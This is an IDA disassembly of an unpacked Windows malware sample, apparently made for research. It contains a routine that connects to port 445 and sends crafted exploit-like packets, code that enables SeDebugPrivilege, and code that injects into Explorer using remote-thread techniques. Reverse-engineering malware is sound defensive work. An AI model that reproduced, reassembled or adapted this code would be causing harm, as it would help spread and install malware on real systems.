;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 1A587DE3CA2BADA58FC1D1899F7C9B9D
; File Name : u:\work\1a587de3ca2bada58fc1d1899f7c9b9d_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31500000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31501000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31501000 dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31501004 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31501008 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_3150100C dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHash ; sub_315028AE+FD�r
dword_31501010 dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31501014 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31501018 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_3150101C dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKeydword_31501020 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31501024 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31501028 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3150102C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_315023E4+1D�r
dword_31501030 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31501034 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_315023E4+4E�r ...
dword_31501038 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownA align 10h
dword_31501040 dd 7C830D74h, 7C80D262h; resolved to->KERNEL32.lstrcmpA ; sub_31503722:loc_31503968�r ...
dword_31501048 dd 7C8360DDh ; resolved to->KERNEL32.SetCurrentDirectoryA ; sub_315029C7+14B�r
dword_3150104C dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_31503608+ED�r
dword_31501050 dd 7C80176Bh ; resolved to->KERNEL32.GetSystemTime ; sub_31503371+A�r
dword_31501054 dd 7C810B1Ch ; resolved to->KERNEL32.SystemTimeToFileTimedword_31501058 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_3150105C dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31501060 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_31501064 dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31501068 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_315029C7+3F�r ...
dword_3150106C dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; UPX0:31503448�r ...
dword_31501070 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31501074 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31501078 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3150107C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31501080 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31501084 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31501088 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_315026C2+8F�r ...
dword_3150108C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventA ; sub_31502BE8+98�r
dword_31501090 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_31502BE8+C2�r
dword_31501094 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_315025F6+F�r
dword_31501098 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_315028AE:loc_31502980�r ...
dword_3150109C dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_315025F6+C3�r
dword_315010A0 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_315011C0+272�r ...
dword_315010A4 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31501A62+E2�r ...
dword_315010A8 dd 7C810111h ; resolved to->KERNEL32.lstrcpynA ; sub_315029C7+69�r ...
dword_315010AC dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_315010B0 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_315017AF+2C�r
dword_315010B4 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_31501D96+EC�r
dword_315010B8 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_315010BC dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_31501911+19�r ...
dword_315010C0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_31502490+92�r
dword_315010C4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31501D1A�r
dword_315010C8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_315031EC+13�r ...
dword_315010CC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_315010D0 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31501911+12�r ...
dword_315010D4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_315010D8 dd 7C80A017h ; resolved to->KERNEL32.SetEvent ; sub_31502B4C+1B�r
dword_315010DC dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_315010E0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_31501BA8+66�r ...
dword_315010E4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_31502128+3F�r ...
dword_315010E8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_315010EC dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_315010F0 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_315029C7+83�r ...
align 8
dword_315010F8 dd 77C1BF18h ; resolved to->MSVCRT.atoidword_315010FC dd 77C4CBE0h ; resolved to->MSVCRT.atandword_31501100 dd 77C4D444h ; resolved to->MSVCRT.sindword_31501104 dd 77C4CD34h ; resolved to->MSVCRT.cos; ---------------------------------------------------------------------------
loc_31501108: ; DATA XREF: sub_31503A98�r
cmp [edi], ah
retn 0FA77h ; DATA XREF: UPX0:loc_31503A92�r
; ---------------------------------------------------------------------------
db 27h, 0C2h, 77h
dword_31501110 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31503722+B9�r
dword_31501114 dd 77C46030h ; resolved to->MSVCRT.strcpydword_31501118 dd 77C46040h ; resolved to->MSVCRT.strcat; ---------------------------------------------------------------------------
loc_3150111C: ; DATA XREF: UPX0:loc_31503A80�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31501120 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_31502490+79�r ...
dword_31501124 dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31501BA8:loc_31501C76�r ...
dword_31501128 dd 77C371BCh ; resolved to->MSVCRT.srand ; sub_31503371+5D�r
dword_3150112C dd 77C46F70h ; resolved to->MSVCRT.memcpydword_31501130 dd 77C478A0h ; resolved to->MSVCRT.strlendword_31501134 dd 77C475F0h ; resolved to->MSVCRT.memset dd 0
dword_3150113C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_31501A62+8B�r ...
dword_31501140 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31501144 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31501148 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessId align 10h
dword_31501150 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlAdword_31501154 dd 42C2C8A1h ; resolved to->WININET.InternetOpenAdword_31501158 dd 42C2ABF4h ; resolved to->WININET.InternetReadFiledword_3150115C dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:31502307�r
dd 0
dword_31501164 dd 71AB2DC0h ; resolved to->WS2_32.selectdword_31501168 dd 71AB2BC0h ; resolved to->WS2_32.ntohldword_3150116C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31501170 dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_31501F6B+7A�r ...
dword_31501174 dd 71AB88D3h ; resolved to->WS2_32.listen ; sub_31501F6B+93�r ...
dword_31501178 dd 71AC1028h ; resolved to->WS2_32.accept ; sub_31501F6B+B5�r ...
dword_3150117C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31501180 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31501184 dd 71AB2BF4h ; resolved to->WS2_32.inet_addrdword_31501188 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_315019F3+25�r
dword_3150118C dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_31501BA8+AC�r ...
dword_31501190 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_31502277+D�r
dword_31501194 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_31501BA8+F0�r ...
dword_31501198 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_31502DEC+46�r
dword_3150119C dd 71AB428Ah ; resolved to->WS2_32.send ; sub_31501A62+67�r ...
dword_315011A0 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_315011C0+1D8�r ...
dword_315011A4 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_31501A62+128�r
dword_315011A8 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_31501A62+12F�r ...
align 10h
dword_315011B0 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315011C0 proc near ; CODE XREF: sub_315020C4+36�p
; sub_31502128+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31503A50
mov eax, dword_315059CC
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_315059D0
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_3150118C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31501720
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_31501190 ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_315010A8 ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_315059C0
push eax
call dword_3150113C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31501233: ; CODE XREF: sub_315011C0+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31501233
push 60h
lea eax, [ebp+var_E4]
push offset dword_315054E0
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A3E ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31503A44 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31503A3E ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A3E ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A3E ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31503A44 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31503A38 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31503A38 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31501194 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31501198 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31501716
mov esi, dword_315010A4
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_3150119C
push 89h
push offset dword_315052C8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0A8h
push offset dword_31505354
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0DEh
push offset dword_31505400
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
cmp eax, 46h
jl loc_3150170B
cmp [ebp+var_730], 31h
jnz loc_315015B6
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31503A38 ; memset
add esp, 0Ch
push offset byte_31505000
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_31505000
push eax
call sub_31503A44 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31503A44 ; memcpy
mov eax, dword_31505906
add esp, 0Ch
mov [ebp+var_798], eax
loc_31501457: ; CODE XREF: sub_315011C0+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 68h
push offset dword_31505544
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0A0h
push offset dword_315055B0
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
cmp [ebp+arg_0], 0
jz loc_315016A6
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31505768
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31503A44 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_315057D4
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31503A44 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31505848
push eax
call sub_31503A44 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_315016FE
; ---------------------------------------------------------------------------
loc_315015B6: ; CODE XREF: sub_315011C0+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31503A38 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31505940
push eax
call sub_31503A44 ; memcpy
push offset byte_31505000
call sub_31503A3E ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_31505000
push eax
call sub_31503A44 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_315059B8
push eax
call sub_31503A44 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31505940
push eax
call sub_31503A44 ; memcpy
add esp, 40h
push offset byte_31505000
call sub_31503A3E ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_31505000
push eax
call sub_31503A44 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31501652: ; CODE XREF: sub_315011C0+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31501652
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31503A38 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31503A38 ; memset
add esp, 18h
jmp loc_31501457
; ---------------------------------------------------------------------------
loc_315016A6: ; CODE XREF: sub_315011C0+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_31505654
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31503A44 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_315056D4
push eax
call sub_31503A44 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_315016FE: ; CODE XREF: sub_315011C0+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_3150170B: ; CODE XREF: sub_315011C0+1AD�j
; sub_315011C0+1E1�j ...
push 2
push [ebp+var_4]
call dword_315011A4 ; shutdown
loc_31501716: ; CODE XREF: sub_315011C0+166�j
push [ebp+var_4]
call dword_315011A8 ; closesocket
pop esi
loc_31501720: ; CODE XREF: sub_315011C0+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_315011C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501727 proc near ; CODE XREF: UPX0:loc_31501D5A�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_315010B4 ; LoadLibraryA
mov esi, dword_315010B0
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_315017AB
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_315017AB
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_315017AB
lea eax, [ebp+var_C]
push eax
push 20h
call dword_315010AC ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_315017AB: ; CODE XREF: sub_31501727+28�j
; sub_31501727+37�j ...
pop edi
pop esi
leave
retn
sub_31501727 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315017AF proc near ; CODE XREF: UPX0:31501D6E�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, ds:dword_31506190
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_315010C4 ; GetModuleHandleA
mov esi, dword_315010B0
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_315017F6
loc_315017F2: ; CODE XREF: sub_315017AF+54�j
push 1
jmp short loc_31501847
; ---------------------------------------------------------------------------
loc_315017F6: ; CODE XREF: sub_315017AF+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_315017F2
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31501144 ; FindWindowA
test eax, eax
jnz short loc_31501824
call dword_31501140 ; GetForegroundWindow
test eax, eax
jnz short loc_31501824
push 2
jmp short loc_31501847
; ---------------------------------------------------------------------------
loc_31501824: ; CODE XREF: sub_315017AF+65�j
; sub_315017AF+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31501148 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_315010C0 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_3150184A
push 3
loc_31501847: ; CODE XREF: sub_315017AF+45�j
; sub_315017AF+73�j
pop eax
jmp short loc_315018B5
; ---------------------------------------------------------------------------
loc_3150184A: ; CODE XREF: sub_315017AF+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_315010BC
test eax, eax
jz short loc_315018A8
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_315010B8 ; WriteProcessMemory
push ds:dword_31506164
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31501894
push eax
call esi ; CloseHandle
jmp short loc_315018AF
; ---------------------------------------------------------------------------
loc_31501894: ; CODE XREF: sub_315017AF+DE�j
push offset aUterm13_2i ; "uterm13.2i"
call sub_315018E8
pop ecx
mov [ebp+var_4], 5
jmp short loc_315018AF
; ---------------------------------------------------------------------------
loc_315018A8: ; CODE XREF: sub_315017AF+B2�j
mov [ebp+var_4], 4
loc_315018AF: ; CODE XREF: sub_315017AF+E3�j
; sub_315017AF+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_315018B5: ; CODE XREF: sub_315017AF+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_315017AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315018BA proc near ; CODE XREF: sub_31501BA8+B�p
; UPX0:31501D30�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_315010C8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_31501128 ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_315018BA endp
; =============== S U B R O U T I N E =======================================
sub_315018E8 proc near ; CODE XREF: sub_315017AF+EA�p
; UPX0:31501D3A�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_315010CC ; CreateMutexA
retn
sub_315018E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315018F7 proc near ; CODE XREF: sub_31501D96+145�p
; sub_31501D96+150�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_315010D0 ; CreateThread
pop ebp
retn
sub_315018F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501911 proc near ; CODE XREF: sub_31501BA8+12C�p
; sub_31501D96+12B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_315010D0 ; CreateThread
push eax
call dword_315010BC ; CloseHandle
pop ebp
retn
sub_31501911 endp
; =============== S U B R O U T I N E =======================================
sub_31501932 proc near ; CODE XREF: sub_31501F6B+26�p
; sub_315025F6+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_3150195A
loc_31501943: ; CODE XREF: sub_31501932+26�j
call dword_31501124 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31501943
loc_3150195A: ; CODE XREF: sub_31501932+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31501932 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501962 proc near ; CODE XREF: sub_315029C7+16B�p
; sub_31503608+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31503A38 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_315010D4 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_315010BC
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_31501962 endp
; =============== S U B R O U T I N E =======================================
sub_315019B8 proc near ; CODE XREF: sub_31502DEC+20�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_31501184 ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_315019D5
test esi, esi
jnz short loc_315019E7
cmp byte ptr [edi], 30h
jz short loc_315019EE
loc_315019D5: ; CODE XREF: sub_315019B8+12�j
push edi
call dword_31501188 ; gethostbyname
test eax, eax
jz short loc_315019E7
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_315019E7: ; CODE XREF: sub_315019B8+16�j
; sub_315019B8+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_315019EE
xor esi, esi
loc_315019EE: ; CODE XREF: sub_315019B8+1B�j
; sub_315019B8+32�j
mov eax, esi
pop edi
pop esi
retn
sub_315019B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315019F3 proc near ; CODE XREF: sub_315021B0+3E�p
; sub_31502277+7�p
